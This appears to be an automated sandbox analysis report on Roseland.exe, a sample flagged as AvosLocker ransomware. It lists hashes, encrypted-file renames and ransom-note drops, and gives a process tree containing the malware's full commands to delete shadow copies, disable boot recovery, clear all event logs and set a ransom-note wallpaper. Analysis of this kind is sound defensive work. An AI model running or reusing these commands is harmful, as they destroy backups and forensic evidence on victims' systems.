Resubmissions
16-03-2023 09:24
230316-ldhxdaab62 1016-03-2023 09:12
230316-k56l3sab26 1030-01-2023 14:58
230130-sb9ewaag73 930-01-2023 14:44
230130-r4m7nscd8s 913-01-2023 09:23
230113-lcgmxsfh22 9Analysis
-
max time kernel
60s -
max time network
36s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16-03-2023 09:12
Static task
static1
Behavioral task
behavioral1
Sample
Roseland.exe
Resource
win7-20230220-en
windows7-x64
13 signatures
150 seconds
Behavioral task
behavioral2
Sample
Roseland.exe
Resource
win10v2004-20230220-en
windows10-2004-x64
13 signatures
150 seconds
General
-
Target
Roseland.exe
-
Size
807KB
-
MD5
19944159dfa94a1b75effd85e6b906dc
-
SHA1
250acf87366f4c0cf91679a0e93dfc79954f0f10
-
SHA256
bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705
-
SHA512
c791840f59c2fc906c197c43e0e1717b9504cf46177a3688ecbd4937cdbf95349d68cc1e63649b85f02df4e6990c4df4756dd8267b062ea5271dd61fc3e508b0
-
SSDEEP
12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYA7:u4s+oT+NXBLi0rjFXvyHBlbnCZa8
Score
10/10
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 1740 bcdedit.exe 2460 bcdedit.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Roseland.exedescription ioc Process File opened for modification C:\Users\Admin\Pictures\HideGroup.tiff Roseland.exe File renamed C:\Users\Admin\Pictures\HideGroup.tiff => C:\Users\Admin\Pictures\HideGroup.tiff.avos2 Roseland.exe File renamed C:\Users\Admin\Pictures\PublishGrant.tif => C:\Users\Admin\Pictures\PublishGrant.tif.avos2 Roseland.exe File renamed C:\Users\Admin\Pictures\ResumeUnregister.tif => C:\Users\Admin\Pictures\ResumeUnregister.tif.avos2 Roseland.exe File renamed C:\Users\Admin\Pictures\SubmitUnpublish.raw => C:\Users\Admin\Pictures\SubmitUnpublish.raw.avos2 Roseland.exe File renamed C:\Users\Admin\Pictures\UnblockClose.raw => C:\Users\Admin\Pictures\UnblockClose.raw.avos2 Roseland.exe File renamed C:\Users\Admin\Pictures\UnregisterOpen.raw => C:\Users\Admin\Pictures\UnregisterOpen.raw.avos2 Roseland.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
Roseland.exedescription ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI Roseland.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Roseland.exedescription ioc Process File opened (read-only) \??\Z: Roseland.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1209476241.png" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Roseland.exedescription ioc Process File created C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\GET_YOUR_FILES_BACK.txt Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye Roseland.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF Roseland.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.ELM Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml Roseland.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP Roseland.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\settings.html Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00910_.WMF Roseland.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui Roseland.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\GET_YOUR_FILES_BACK.txt Roseland.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt Roseland.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\GET_YOUR_FILES_BACK.txt Roseland.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMARQ.XML Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_F_COL.HXK Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0297551.WMF Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT Roseland.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar Roseland.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\de-DE\PurblePlace.exe.mui Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png Roseland.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Thatch.thmx Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF Roseland.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF Roseland.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\GET_YOUR_FILES_BACK.txt Roseland.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp Roseland.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\logo.png Roseland.exe File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp Roseland.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] Roseland.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png Roseland.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\GET_YOUR_FILES_BACK.txt Roseland.exe File opened for modification C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver Roseland.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif Roseland.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp Roseland.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac Roseland.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\.lastModified Roseland.exe File opened for modification C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui Roseland.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 2112 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
Roseland.exepowershell.exepowershell.exepid Process 1728 Roseland.exe 2716 powershell.exe 2900 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Roseland.exeWMIC.exevssvc.exepowershell.exedescription pid Process Token: SeTakeOwnershipPrivilege 1728 Roseland.exe Token: SeIncreaseQuotaPrivilege 2424 WMIC.exe Token: SeSecurityPrivilege 2424 WMIC.exe Token: SeTakeOwnershipPrivilege 2424 WMIC.exe Token: SeLoadDriverPrivilege 2424 WMIC.exe Token: SeSystemProfilePrivilege 2424 WMIC.exe Token: SeSystemtimePrivilege 2424 WMIC.exe Token: SeProfSingleProcessPrivilege 2424 WMIC.exe Token: SeIncBasePriorityPrivilege 2424 WMIC.exe Token: SeCreatePagefilePrivilege 2424 WMIC.exe Token: SeBackupPrivilege 2424 WMIC.exe Token: SeRestorePrivilege 2424 WMIC.exe Token: SeShutdownPrivilege 2424 WMIC.exe Token: SeDebugPrivilege 2424 WMIC.exe Token: SeSystemEnvironmentPrivilege 2424 WMIC.exe Token: SeRemoteShutdownPrivilege 2424 WMIC.exe Token: SeUndockPrivilege 2424 WMIC.exe Token: SeManageVolumePrivilege 2424 WMIC.exe Token: 33 2424 WMIC.exe Token: 34 2424 WMIC.exe Token: 35 2424 WMIC.exe Token: SeBackupPrivilege 2580 vssvc.exe Token: SeRestorePrivilege 2580 vssvc.exe Token: SeAuditPrivilege 2580 vssvc.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeIncreaseQuotaPrivilege 2424 WMIC.exe Token: SeSecurityPrivilege 2424 WMIC.exe Token: SeTakeOwnershipPrivilege 2424 WMIC.exe Token: SeLoadDriverPrivilege 2424 WMIC.exe Token: SeSystemProfilePrivilege 2424 WMIC.exe Token: SeSystemtimePrivilege 2424 WMIC.exe Token: SeProfSingleProcessPrivilege 2424 WMIC.exe Token: SeIncBasePriorityPrivilege 2424 WMIC.exe Token: SeCreatePagefilePrivilege 2424 WMIC.exe Token: SeBackupPrivilege 2424 WMIC.exe Token: SeRestorePrivilege 2424 WMIC.exe Token: SeShutdownPrivilege 2424 WMIC.exe Token: SeDebugPrivilege 2424 WMIC.exe Token: SeSystemEnvironmentPrivilege 2424 WMIC.exe Token: SeRemoteShutdownPrivilege 2424 WMIC.exe Token: SeUndockPrivilege 2424 WMIC.exe Token: SeManageVolumePrivilege 2424 WMIC.exe Token: 33 2424 WMIC.exe Token: 34 2424 WMIC.exe Token: 35 2424 WMIC.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
Roseland.execmd.execmd.execmd.execmd.execmd.exepowershell.exedescription pid Process procid_target PID 1728 wrote to memory of 2044 1728 Roseland.exe 28 PID 1728 wrote to memory of 2044 1728 Roseland.exe 28 PID 1728 wrote to memory of 2044 1728 Roseland.exe 28 PID 1728 wrote to memory of 2044 1728 Roseland.exe 28 PID 1728 wrote to memory of 1300 1728 Roseland.exe 29 PID 1728 wrote to memory of 1300 1728 Roseland.exe 29 PID 1728 wrote to memory of 1300 1728 Roseland.exe 29 PID 1728 wrote to memory of 1300 1728 Roseland.exe 29 PID 1728 wrote to memory of 1412 1728 Roseland.exe 30 PID 1728 wrote to memory of 1412 1728 Roseland.exe 30 PID 1728 wrote to memory of 1412 1728 Roseland.exe 30 PID 1728 wrote to memory of 1412 1728 Roseland.exe 30 PID 1728 wrote to memory of 1684 1728 Roseland.exe 31 PID 1728 wrote to memory of 1684 1728 Roseland.exe 31 PID 1728 wrote to memory of 1684 1728 Roseland.exe 31 PID 1728 wrote to memory of 1684 1728 Roseland.exe 31 PID 1728 wrote to memory of 748 1728 Roseland.exe 32 PID 1728 wrote to memory of 748 1728 Roseland.exe 32 PID 1728 wrote to memory of 748 1728 Roseland.exe 32 PID 1728 wrote to memory of 748 1728 Roseland.exe 32 PID 1684 wrote to memory of 1740 1684 cmd.exe 33 PID 1684 wrote to memory of 1740 1684 cmd.exe 33 PID 1684 wrote to memory of 1740 1684 cmd.exe 33 PID 1300 wrote to memory of 2112 1300 cmd.exe 34 PID 1300 wrote to memory of 2112 1300 cmd.exe 34 PID 1300 wrote to memory of 2112 1300 cmd.exe 34 PID 748 wrote to memory of 2716 748 cmd.exe 35 PID 748 wrote to memory of 2716 748 cmd.exe 35 PID 748 wrote to memory of 2716 748 cmd.exe 35 PID 2044 wrote to memory of 2424 2044 cmd.exe 37 PID 2044 wrote to memory of 2424 2044 cmd.exe 37 PID 2044 wrote to memory of 2424 2044 cmd.exe 37 PID 1412 wrote to memory of 2460 1412 cmd.exe 36 PID 1412 wrote to memory of 2460 1412 cmd.exe 36 PID 1412 wrote to memory of 2460 1412 cmd.exe 36 PID 1728 wrote to memory of 2900 1728 Roseland.exe 42 PID 1728 wrote to memory of 2900 1728 Roseland.exe 42 PID 1728 wrote to memory of 2900 1728 Roseland.exe 42 PID 1728 wrote to memory of 2900 1728 Roseland.exe 42 PID 2900 wrote to memory of 3392 2900 powershell.exe 43 PID 2900 wrote to memory of 3392 2900 powershell.exe 43 PID 2900 wrote to memory of 3392 2900 powershell.exe 43 PID 2900 wrote to memory of 3512 2900 powershell.exe 44 PID 2900 wrote to memory of 3512 2900 powershell.exe 44 PID 2900 wrote to memory of 3512 2900 powershell.exe 44 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Roseland.exe"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"1⤵
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2112
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2460
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1740
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"2⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1209476241.png /f3⤵
- Sets desktop wallpaper using registry
PID:3392
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False3⤵PID:3512
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1011B
MD56d81ed40ba0a283e5483bfe6a448e9d7
SHA10c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA5128956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379
-
Filesize
32KB
MD51524411f3d6138062f1bd5ab5d31338c
SHA149292962485c61cf2307b139b494da8512a52916
SHA256d5e0fa9b4d02e1225dff1af879333969f9245e8a2820a1635130ffccb6b27dd2
SHA512ec8346d0c0b5ebcf171eb8aaf02d41ad3785f1a6c39c9e16ec9c84fd857ccd8d59f4ab69df5c1a919eb1248af2929b61cd9ca7292091ffb09352234b6c3c4c55
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c9734dd629f10b384479160ed4046063
SHA14d98ef5d3cb709eaa6683d6c09c1c2317362b06b
SHA25676c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
SHA512144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVFLMG0ZOJDG33R86VBG.temp
Filesize7KB
MD5c9734dd629f10b384479160ed4046063
SHA14d98ef5d3cb709eaa6683d6c09c1c2317362b06b
SHA25676c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
SHA512144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17
-
Filesize
1011B
MD56d81ed40ba0a283e5483bfe6a448e9d7
SHA10c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA5128956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
